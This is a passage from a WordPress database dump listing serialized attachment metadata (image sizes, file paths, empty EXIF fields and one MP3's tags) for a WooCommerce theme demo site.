g\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product1-gallery2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product1-gallery2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product1-gallery2-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product1-gallery2-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product1-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product1-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(572,758,'_wp_attached_file','2018/01/Fingers-In-The-Noise-Elixir.mp3'),(573,4189,'_wp_attachment_image_alt','a'),(574,4206,'_wp_attached_file','2018/03/ruze.png'),(575,4206,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:402;s:6:\"height\";i:400;s:4:\"file\";s:16:\"2018/03/ruze.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:16:\"ruze-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:16:\"ruze-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"ruze-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"ruze-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:16:\"ruze-402x300.png\";s:5:\"width\";i:402;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:16:\"ruze-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:16:\"ruze-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:16:\"ruze-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(576,758,'_wp_attachment_metadata','a:24:{s:10:\"dataformat\";s:3:\"mp3\";s:8:\"channels\";i:2;s:11:\"sample_rate\";i:44100;s:7:\"bitrate\";i:256000;s:11:\"channelmode\";s:12:\"joint stereo\";s:12:\"bitrate_mode\";s:3:\"cbr\";s:5:\"codec\";s:4:\"LAME\";s:7:\"encoder\";s:9:\"LAME3.99r\";s:8:\"lossless\";b:0;s:15:\"encoder_options\";s:6:\"CBR256\";s:17:\"compression_ratio\";d:0.181405895691609975184377390178269706666469573974609375;s:10:\"fileformat\";s:3:\"mp3\";s:8:\"filesize\";i:4701520;s:9:\"mime_type\";s:10:\"audio/mpeg\";s:6:\"length\";i:147;s:16:\"length_formatted\";s:4:\"2:27\";s:5:\"album\";s:33:\"One Different Compilation (NUA01)\";s:5:\"title\";s:6:\"Elixir\";s:7:\"comment\";s:40:\"Released for free under Creative Commons\";s:4:\"text\";s:16:\"Nu Aura Netlabel\";s:6:\"artist\";s:20:\"Fingers In The Noise\";s:4:\"year\";s:4:\"2011\";s:14:\"recording_time\";s:4:\"2011\";s:5:\"genre\";s:26:\"Emotional Electronic Music\";}'),(577,4207,'_wp_attached_file','2018/03/ruze-1.png'),(578,4207,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:402;s:6:\"height\";i:400;s:4:\"file\";s:18:\"2018/03/ruze-1.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"ruze-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"ruze-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"ruze-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"ruze-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:18:\"ruze-1-402x300.png\";s:5:\"width\";i:402;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:18:\"ruze-1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:18:\"ruze-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"ruze-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(579,1151,'_wp_attachment_image_alt','a'),(580,764,'_wp_attached_file','2018/01/blog-img-4.jpg'),(581,764,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1100;s:6:\"height\";i:733;s:4:\"file\";s:22:\"2018/01/blog-img-4.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"blog-img-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"blog-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"blog-img-4-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"blog-img-4-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"blog-img-4-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"blog-img-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"blog-img-4-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"blog-img-4-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"blog-img-4-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"blog-img-4-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:23:\"blog-img-4-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"blog-img-4-550x733.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:733;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"blog-img-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"blog-img-4-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"blog-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(582,1152,'_wp_attachment_image_alt','a'),(583,1153,'_wp_attached_file','2018/01/product1-gallery3.jpg'),(584,1153,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product1-gallery3.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product1-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product1-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product1-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product1-gallery3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product1-gallery3-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product1-gallery3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product1-gallery3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product1-gallery3-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product1-gallery3-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product1-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product1-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(585,724,'_wp_attachment_image_alt','a'),(586,754,'_wp_attachment_image_alt','a'),(587,764,'_wp_attachment_image_alt','a'),(588,774,'_wp_attached_file','2018/01/h4-img-10.jpg'),(589,774,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1550;s:6:\"height\";i:678;s:4:\"file\";s:21:\"2018/01/h4-img-10.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h4-img-10-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h4-img-10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"h4-img-10-600x262.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h4-img-10-300x131.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:131;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"h4-img-10-1024x448.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:448;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h4-img-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"h4-img-10-768x336.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:336;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"h4-img-10-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"h4-img-10-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"h4-img-10-1536x672.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:672;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"h4-img-10-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:22:\"h4-img-10-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"h4-img-10-550x678.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:678;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:22:\"h4-img-10-1100x678.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:678;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"h4-img-10-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"h4-img-10-600x262.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h4-img-10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(590,1473,'_wp_attachment_image_alt','a'),(591,1492,'_wp_attached_file','2018/01/h8-background-img-11-scaled.jpg'),(592,1152,'_wp_attachment_image_alt','a'),(593,1153,'_wp_attachment_image_alt',''),(594,4206,'_wp_attachment_image_alt','o'),(595,4207,'_wp_attachment_image_alt','o'),(596,1156,'_wp_attached_file','2018/01/product2-gallery1.jpg'),(597,1156,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product2-gallery1.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product2-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product2-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product2-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product2-gallery1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product2-gallery1-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product2-gallery1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product2-gallery1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product2-gallery1-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product2-gallery1-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product2-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product2-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(598,4208,'_wp_attached_file','2018/03/h4-slide1-graphic2-1.png'),(599,4208,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:416;s:6:\"height\";i:434;s:4:\"file\";s:32:\"2018/03/h4-slide1-graphic2-1.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"h4-slide1-graphic2-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"h4-slide1-graphic2-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"h4-slide1-graphic2-1-288x300.png\";s:5:\"width\";i:288;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"h4-slide1-graphic2-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:32:\"h4-slide1-graphic2-1-416x300.png\";s:5:\"width\";i:416;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:32:\"h4-slide1-graphic2-1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:32:\"h4-slide1-graphic2-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"h4-slide1-graphic2-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(600,4209,'_wp_attached_file','2018/03/h4-slide1-graphic2-1-1.png'),(601,4209,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:416;s:6:\"height\";i:434;s:4:\"file\";s:34:\"2018/03/h4-slide1-graphic2-1-1.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:34:\"h4-slide1-graphic2-1-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"h4-slide1-graphic2-1-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"h4-slide1-graphic2-1-1-288x300.png\";s:5:\"width\";i:288;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"h4-slide1-graphic2-1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:34:\"h4-slide1-graphic2-1-1-416x300.png\";s:5:\"width\";i:416;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:34:\"h4-slide1-graphic2-1-1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:34:\"h4-slide1-graphic2-1-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"h4-slide1-graphic2-1-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(602,1153,'_wp_attachment_image_alt',''),(603,1156,'_wp_attachment_image_alt','q'),(604,1157,'_wp_attached_file','2018/01/product2-gallery2.jpg'),(605,1157,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product2-gallery2.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product2-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product2-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product2-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product2-gallery2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product2-gallery2-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product2-gallery2-300x240.jpg\"